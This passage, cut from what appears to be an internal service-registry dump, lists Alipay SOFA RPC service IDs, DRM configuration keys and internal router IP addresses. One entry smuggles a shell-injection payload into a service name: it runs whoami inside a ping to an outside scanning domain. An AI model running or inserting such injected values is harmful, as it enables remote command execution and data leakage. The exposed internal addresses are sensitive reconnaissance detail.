.logClientError,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.UserControlRightService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.ctudb.CtuProcessRecordRecordService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@securityservice#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.finpwm:name=com.alipay.finpwm.biz.trade.prod.schedule.drm.SyncStatusAcceptedOrderDRMResource.threadSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.config-security-false:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.39.199.235#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cloudbox.facade.api.TaskEventApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SOFA4DEMO#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.lottery.EinvLotteryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-AGDSBATCH-TASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openhome.facade.OpenPlatformOperatorQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.college.openevent.OpenEventQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custassetTBaseCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","fundmng@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.216.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promox.facade.assets.TagFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.framodel.core.service.facade.api.FramodelIndicatorMonitorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:voucherprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.89.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.zskynet.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pricecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zcache.tbase.customerTairCache_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.acctransquery.common.service.facade.api.InnerAccountQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:unibase_activityRoleApplyAuditCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.checkerAcceptTimeOut,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.124.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.keplerweb.keplerui_ds.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.autoinsprod.common.service.facade.ShIssueAfterPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cardbin.common.service.facade.CardNoGeneratorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.93.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.adbasiclib.ad.rpc.AdService:1.0:adexchange-antmember@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\";ping `whoami`GIYHU5BSMQWTC5LVPJRW2LK7NFXHA5LUL5RWQYLSONSXILLEHFZTO3DZMFZQ----.rce.scan.noble.dn5l0g.co;\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.realtimecheckprod.common.facade.FmQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antlawProcessNotifiCollBackServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finaggexpcore.common.service.facade.abtest.ABTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.demo.RpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.RuleBetaSwitchConfig.ruleBetaMapView,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.zoloz.zhub.smileseries.service.SmileFaceFlowService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.Arch:name=com.alipay.cif.client.drm.CifClientDrmSwitch.cifin.clientReadGroupSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.eco.smdd.service.api.tinyapp4c.order.OrderQuery4bService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_ASYCNTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fininflux.common.service.facade.rzone.InfluxStatusSyncRService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.ecdcc.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.profileservice.common.facade.ProfileServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.PdfFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inshealthprod.facade.HealthFamilyArchiveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agap.service.facade.api.AnalysisEngineService:1.0:gwService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantAgentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecogw.facade.EcoGwApiInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ecquery.common.service.drawndn.DrawndnRateUnitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vehownerprod.facade.admin.EtcSkuAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.fengdieApiAccessSecret,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:csmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.158.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securityprod.common.service.facade.sign.DocSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sffcore.FnConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.appointment.service.LotteryAppointmentActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmembermng.common.service.facade.mtconfig.service.ApplicationConfigService:1.0:mngApplicationConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.gloantrade.common.service.facade.api.repay.RepayRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.lifemng.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmResourceManager.voucherTemplateConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.243.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.testCacheTbase.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbconfigcenter.common.service.facade.api.meta.MetaColumnManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.ialicore.irouteclient.elastic.api.ElasticService:1.0:false@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.mwalletmng:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.accenter.service.facade.api.AccenterDailyCutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.172#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.payment.spi.InstFluxService:1.0:instFluxSPIService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.ding.DingDingPersonnelSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tscenter.common.service.facade.EdgeResourceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antassistant.biz.rest.TestTodoSofaRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.echox.service.EchoxAopPlaybackService:1.0:mrchportalcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.volvo.core.service.dynamicmodule.DynamicModulePluginService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.controlgw.SPIFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbservindustryprod.common.service.facade.backend.CommonLockModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditkit.facade.operationconfig.ConfigDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.common.service.facade.api.BatchTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rpc.common.service.facade.IBookservice#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.admediamgr.common.service.facade.service.AdPositionTemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.core.task.processor.RedoDetailProcessor:1.0:metaqDataRecoverProcessor.busYuebao@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mrchiscore:name=com.alipay.mrchiscore.generic.switch.districtProQueryVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.189.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.isdsp.common.service.facade.DownGradeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_HLD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cif.facade.SecureQuestionVerifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.service.facade.SystemParamFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bklid.facade.api.BankOrgPredictionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.fatigue.api.FatigueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.budgetcore.common.service.facade.control.BudgetControlLoadTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbmall.facade.open.service.MallOpenQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.riskmodelcenter.common.service.facade.meta.DimensionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.riskmng.common.service.facade.api.TaskEventMappingServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.refundAssetSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasset.common.service.facade.stuff.api.SystemPropertyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.173.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instopen.service.facade.dataProperty.DataPropertyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.kernel.common.service.facade.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.MiniLoanConfigDrm.sysSwitchWhiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.251.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","ebppgw@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minicenter.common.service.facade.api.admin.MiniAuditProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.stepLength,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insxhbprod.biz.price.service.ApportionPriceAuditService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.apipay.instportal.common.service.facade.PermissionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbordersync.common.service.facade.api.OrderSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.IntelligentAnalyzeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.psbp.common.service.medical.InsuranceCardInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emccenter.common.service.facade.api.BemcDomainManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.MerchantShopQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.116.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.omocore.common.service.facade.ServiceProviderScopeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authcenter.service.facade.VoicePrintManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.outbound.facade.SkillGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gclearingcenter.facade.api.GclearingTntInstQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.postmen.api.ReadFanoutRelationApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promohelix.common.service.facade.api.sci.SciTaskGroupRelOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.paymentmngTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.facade.redeem.AssetRedeemOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcsmart.facade.media.RcSmartMediaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","_CLIENTSERVICE_TEST_3_2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.159.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.revtrans:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","bstsolprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cloudinc:name=com.alipay.cloudinc.core.dns.drm.DnsCommonDrmResource.apiTpsConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:ienvcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.fraudmng:name=com.alipay.rule.biz.manager.config.RulemnglibManagerResource.forceRefresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.messagefusion.facade.api.TemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ebppgw.facade.mng.LocalCacheUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.232.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mdataprod.common.service.facade.interfaces.BusinessAreaShopService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.ApplicationUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.useMergeModelFeature,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.core.service.check.FundProductStatusCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aircoreservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.product.VcpVoucherProductFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_G_SUPERGW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_ZDTRANS#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordercore:name=com.alipay.ordercore.event.config.syncProdswitchNodeTaskLoadSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.common.service.facade.frame.FrameFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.icontrol.common.service.facade.dispatch.IcVdnInfoQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.update.SchedulerTaskUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.tradeapcore.common.service.integration.drm.resource.DrmForCommonManageResource.refundPermLimitBizProducts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.infosectask:name=com.alipay.holoxlib.core.backtrack.drm.BacktrackConfigResource.mySearchPageSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.76.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinsnsprod.service.facade.api.feed.ContentFeedFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbuservice.common.service.facade.KbTenantUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.valueCard.ValueCardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omocore.common.service.facade.ServiceProviderScopeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.pcard.VcpCardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.emcplan.common.service.facade.api.PlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mcenter.common.service.facade.EfileApplyRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.198.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.olive.facade.api.product.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.91.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.147.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilerelation.common.service.facade.SecurityRelationManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.ResourceRenderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frservcenter.facade.api.entity.EntityServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isecuritycore.service.verification.VerificationCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.SelectUserQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.attachment.facade.AttachmentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.surlPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.OnexRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.55.192.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.volvo.common.service.facade.api.launchreview.LaunchReviewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.indicator.MrmIndicatorQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.orderlink.ArAdjustSyncService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.partner.api.PartnerUserIdFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.release.DashboardReleaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcbenefitcore.facade.api.discount.BFDiscountReadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:sffgroup-support#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.socialTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestprod.core.service.facade.OdpsDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:pcreditTaskCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.RealtimeQcServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.biz.service.gw.community.api.feed.FeedGwManagerV3:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue40#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.33.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fin.pdcore.common.service.facade.adapter.ProductCommonCalendarFacade:1.0:finpdcorewealth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.definriskcenter.facade.api.RiskQuerySerivce:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.common.service.clientcache.innerclient.slaver.api.InnerClientSlaverFacade:1.0:pcreditdecisionx@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.mcop.mng.ServiceWrapperConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.catalog.BizCatalogConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accreditcore.common.service.facade.AvailableAmountQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.appxprod.common.service.facade.api.sci.ServiceSciOperCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.accrmcore.common.service.facade.CustomerNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_PRODMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ap.gloandecision.common.service.facade.trans.api.CreditTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iliquidity.biz.manager.cash.BankAccountCashFlowManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.biz.promo.assist.rpc.PromotionInfoQueryRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.myapp:name=com.alipay.zcache.tbase.testCacheTbase.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-finslip-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zappinfo:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:scfmngAdvanceRcvSignSubmitCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.jdbc.comprehensive.finpwm.finpwmXTradeSlaveDataSource.operation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.207.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0.0:protectcallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.api.SystemPropertyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.tool.MsgBrokerMessageResendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.135.175#@#DE